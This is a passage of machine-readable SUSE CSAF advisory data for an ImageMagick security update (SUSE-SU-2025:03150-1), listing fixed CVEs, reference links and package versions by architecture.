"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-SUSE-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-config-7-upstream-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:ImageMagick-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-7_Q16HDRI4-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagick++-devel-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickCore-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:libMagickWand-7_Q16HDRI6-7.0.7.34-150200.10.62.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:perl-PerlMagick-7.0.7.34-150200.10.62.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:01:34Z",
"details": "important"
}
],
"title": "CVE-2025-57803"
}
]
}
suse-su-2025:03150-1
Vulnerability from csaf_suse
Notes
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for ImageMagick",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for ImageMagick fixes the following issues:\n\n- CVE-2025-55005: Fixed heap buffer overflow when transforming from Log to sRGB colorspaces (bsc#1248077).\n- CVE-2025-55154: Fixed integer overflow when performing magnified size calculations in ReadOneMNGIMage (bsc#1248078).\n- CVE-2025-55160: Fixed undefined behavior due to function-type-mismatch in CloneSplayTree (bsc#1248079).\n- CVE-2025-55212: Fixed division-by-zero in ThumbnailImage() when passing a geometry string containing only a colon to\n `montage -geometry` (bsc#1248767).\n- CVE-2025-55298: Fixed heap overflow due to format string bug vulnerability (bsc#1248780).\n- CVE-2025-57803: Fixed heap out-of-bounds (OOB) write due to 32-bit integer overflow (bsc#1248784).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-3150,SUSE-SLE-SERVER-12-SP5-LTSS-2025-3150,SUSE-SLE-SERVER-12-SP5-LTSS-EXTENDED-SECURITY-2025-3150",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_03150-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:03150-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-202503150-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:03150-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2025-September/041608.html"
},
{
"category": "self",
"summary": "SUSE Bug 1248077",
"url": "https://bugzilla.suse.com/1248077"
},
{
"category": "self",
"summary": "SUSE Bug 1248078",
"url": "https://bugzilla.suse.com/1248078"
},
{
"category": "self",
"summary": "SUSE Bug 1248079",
"url": "https://bugzilla.suse.com/1248079"
},
{
"category": "self",
"summary": "SUSE Bug 1248767",
"url": "https://bugzilla.suse.com/1248767"
},
{
"category": "self",
"summary": "SUSE Bug 1248780",
"url": "https://bugzilla.suse.com/1248780"
},
{
"category": "self",
"summary": "SUSE Bug 1248784",
"url": "https://bugzilla.suse.com/1248784"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55005 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55160 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55160/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55212 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55212/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-55298 page",
"url": "https://www.suse.com/security/cve/CVE-2025-55298/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-57803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-57803/"
}
],
"title": "Security update for ImageMagick",
"tracking": {
"current_release_date": "2025-09-10T17:58:50Z",
"generator": {
"date": "2025-09-10T17:58:50Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:03150-1",
"initial_release_date": "2025-09-10T17:58:50Z",
"revision_history": [
{
"date": "2025-09-10T17:58:50Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "ImageMagick-6.8.8.1-71.212.1.aarch64",
"product_id": "ImageMagick-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"product_id": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"product_id": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"product_id": "ImageMagick-devel-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "ImageMagick-extra-6.8.8.1-71.212.1.aarch64",
"product_id": "ImageMagick-extra-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.aarch64",
"product_id": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"product_id": "libMagick++-devel-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"product_id": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"product_id": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-6.8.8.1-71.212.1.aarch64",
"product": {
"name": "perl-PerlMagick-6.8.8.1-71.212.1.aarch64",
"product_id": "perl-PerlMagick-6.8.8.1-71.212.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-devel-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product": {
"name": "ImageMagick-devel-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product_id": "ImageMagick-devel-64bit-6.8.8.1-71.212.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product": {
"name": "libMagick++-6_Q16-3-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product_id": "libMagick++-6_Q16-3-64bit-6.8.8.1-71.212.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product": {
"name": "libMagick++-devel-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product_id": "libMagick++-devel-64bit-6.8.8.1-71.212.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product": {
"name": "libMagickCore-6_Q16-1-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product_id": "libMagickCore-6_Q16-1-64bit-6.8.8.1-71.212.1.aarch64_ilp32"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product": {
"name": "libMagickWand-6_Q16-1-64bit-6.8.8.1-71.212.1.aarch64_ilp32",
"product_id": "libMagickWand-6_Q16-1-64bit-6.8.8.1-71.212.1.aarch64_ilp32"
}
}
],
"category": "architecture",
"name": "aarch64_ilp32"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-6.8.8.1-71.212.1.i586",
"product": {
"name": "ImageMagick-6.8.8.1-71.212.1.i586",
"product_id": "ImageMagick-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.i586",
"product": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.i586",
"product_id": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.i586",
"product": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.i586",
"product_id": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-6.8.8.1-71.212.1.i586",
"product": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.i586",
"product_id": "ImageMagick-devel-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-6.8.8.1-71.212.1.i586",
"product": {
"name": "ImageMagick-extra-6.8.8.1-71.212.1.i586",
"product_id": "ImageMagick-extra-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.i586",
"product": {
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.i586",
"product_id": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-6.8.8.1-71.212.1.i586",
"product": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.i586",
"product_id": "libMagick++-devel-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.i586",
"product": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.i586",
"product_id": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.i586",
"product": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.i586",
"product_id": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.i586"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-6.8.8.1-71.212.1.i586",
"product": {
"name": "perl-PerlMagick-6.8.8.1-71.212.1.i586",
"product_id": "perl-PerlMagick-6.8.8.1-71.212.1.i586"
}
}
],
"category": "architecture",
"name": "i586"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-doc-6.8.8.1-71.212.1.noarch",
"product": {
"name": "ImageMagick-doc-6.8.8.1-71.212.1.noarch",
"product_id": "ImageMagick-doc-6.8.8.1-71.212.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "ImageMagick-6.8.8.1-71.212.1.ppc64le",
"product_id": "ImageMagick-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"product_id": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"product_id": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"product_id": "ImageMagick-devel-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "ImageMagick-extra-6.8.8.1-71.212.1.ppc64le",
"product_id": "ImageMagick-extra-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.ppc64le",
"product_id": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"product_id": "libMagick++-devel-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"product_id": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"product_id": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-6.8.8.1-71.212.1.ppc64le",
"product": {
"name": "perl-PerlMagick-6.8.8.1-71.212.1.ppc64le",
"product_id": "perl-PerlMagick-6.8.8.1-71.212.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-6.8.8.1-71.212.1.s390",
"product": {
"name": "ImageMagick-6.8.8.1-71.212.1.s390",
"product_id": "ImageMagick-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390",
"product": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390",
"product_id": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390",
"product": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390",
"product_id": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-6.8.8.1-71.212.1.s390",
"product": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.s390",
"product_id": "ImageMagick-devel-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-6.8.8.1-71.212.1.s390",
"product": {
"name": "ImageMagick-extra-6.8.8.1-71.212.1.s390",
"product_id": "ImageMagick-extra-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.s390",
"product": {
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.s390",
"product_id": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-6.8.8.1-71.212.1.s390",
"product": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.s390",
"product_id": "libMagick++-devel-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390",
"product": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390",
"product_id": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390",
"product": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390",
"product_id": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-6.8.8.1-71.212.1.s390",
"product": {
"name": "perl-PerlMagick-6.8.8.1-71.212.1.s390",
"product_id": "perl-PerlMagick-6.8.8.1-71.212.1.s390"
}
}
],
"category": "architecture",
"name": "s390"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-6.8.8.1-71.212.1.s390x",
"product": {
"name": "ImageMagick-6.8.8.1-71.212.1.s390x",
"product_id": "ImageMagick-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"product": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"product_id": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"product": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"product_id": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"product": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"product_id": "ImageMagick-devel-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-6.8.8.1-71.212.1.s390x",
"product": {
"name": "ImageMagick-devel-32bit-6.8.8.1-71.212.1.s390x",
"product_id": "ImageMagick-devel-32bit-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-6.8.8.1-71.212.1.s390x",
"product": {
"name": "ImageMagick-extra-6.8.8.1-71.212.1.s390x",
"product_id": "ImageMagick-extra-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.s390x",
"product_id": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-32bit-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagick++-6_Q16-3-32bit-6.8.8.1-71.212.1.s390x",
"product_id": "libMagick++-6_Q16-3-32bit-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.s390x",
"product_id": "libMagick++-devel-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagick++-devel-32bit-6.8.8.1-71.212.1.s390x",
"product_id": "libMagick++-devel-32bit-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"product_id": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-32bit-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagickCore-6_Q16-1-32bit-6.8.8.1-71.212.1.s390x",
"product_id": "libMagickCore-6_Q16-1-32bit-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"product_id": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-32bit-6.8.8.1-71.212.1.s390x",
"product": {
"name": "libMagickWand-6_Q16-1-32bit-6.8.8.1-71.212.1.s390x",
"product_id": "libMagickWand-6_Q16-1-32bit-6.8.8.1-71.212.1.s390x"
}
},
{
"category": "product_version",
"name": "perl-PerlMagick-6.8.8.1-71.212.1.s390x",
"product": {
"name": "perl-PerlMagick-6.8.8.1-71.212.1.s390x",
"product_id": "perl-PerlMagick-6.8.8.1-71.212.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ImageMagick-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "ImageMagick-6.8.8.1-71.212.1.x86_64",
"product_id": "ImageMagick-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"product_id": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"product_id": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"product_id": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-devel-32bit-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "ImageMagick-devel-32bit-6.8.8.1-71.212.1.x86_64",
"product_id": "ImageMagick-devel-32bit-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "ImageMagick-extra-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "ImageMagick-extra-6.8.8.1-71.212.1.x86_64",
"product_id": "ImageMagick-extra-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagick++-6_Q16-3-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-6_Q16-3-32bit-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagick++-6_Q16-3-32bit-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagick++-6_Q16-3-32bit-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagick++-devel-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagick++-devel-32bit-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagick++-devel-32bit-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagick++-devel-32bit-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickCore-6_Q16-1-32bit-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagickCore-6_Q16-1-32bit-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagickCore-6_Q16-1-32bit-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
"name": "libMagickWand-6_Q16-1-32bit-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "libMagickWand-6_Q16-1-32bit-6.8.8.1-71.212.1.x86_64",
"product_id": "libMagickWand-6_Q16-1-32bit-6.8.8.1-71.212.1.x86_64"
}
},
{
"category": "product_version",
